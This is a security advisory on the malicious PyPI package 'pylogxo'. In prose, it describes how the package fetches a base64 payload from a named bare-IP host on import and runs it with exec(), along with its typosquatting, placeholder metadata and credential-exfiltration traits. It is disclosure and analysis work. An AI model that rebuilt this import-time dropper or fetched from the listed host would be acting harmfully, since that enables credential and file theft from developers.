Malicious code in pylogxo (PyPI)

---

__

Source: amazon-inspector (bbeee018f429f5a978b85aa3999c8e24251a85dc787b1e4fd673abcabf157800)

On import pylogx, the package spawns a background thread that sleeps 5-20 seconds, force-installs sensitive third-party packages (cryptography, pycryptodomex, secretstorage, opencv-python, pillow, psutil) via pip, then fetches a base64-encoded blob from http://69.164.245.166/payload.txt over plaintext HTTP and passes the decoded bytes to exec() with a synthetic __name__ = "__payload__". The destination is a bare IP with no TLS, no pinning, and no signature verification, so any code the operator of that host serves runs in the importing process. The pre-installed dependency set (secretstorage + cryptography) is consistent with a follow-on credential / keyring harvester. The package is also distributed under the name pylogxo while installing the import name pylogx — a near-edit of legitimate logging library names — and ships placeholder metadata (empty README, https://github.com/example/pylogx, support@pylogx.example) and references submodules (formatter, handlers) that do not exist in the tarball, so the module will ImportError only after the dropper thread has already fired. There is no legitimate reason for a logging utility to fetch and execute remote code at import time.

Source: kam193 (7ccb3e3a1ccde821415d6be9c25d123cc1ebedea4ca6dd40d77fc24e01cd0aaa)

During import, the package downloads and executes remote code being an infostealer.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-pylogxo

Reasons (based on the campaign):

• Downloads and executes a remote malicious script.

• infostealer

• The package contains code to detect if it is running in a sandbox environment.

• exfiltration-credentials

• exfiltration-browser-data

• files-exfiltration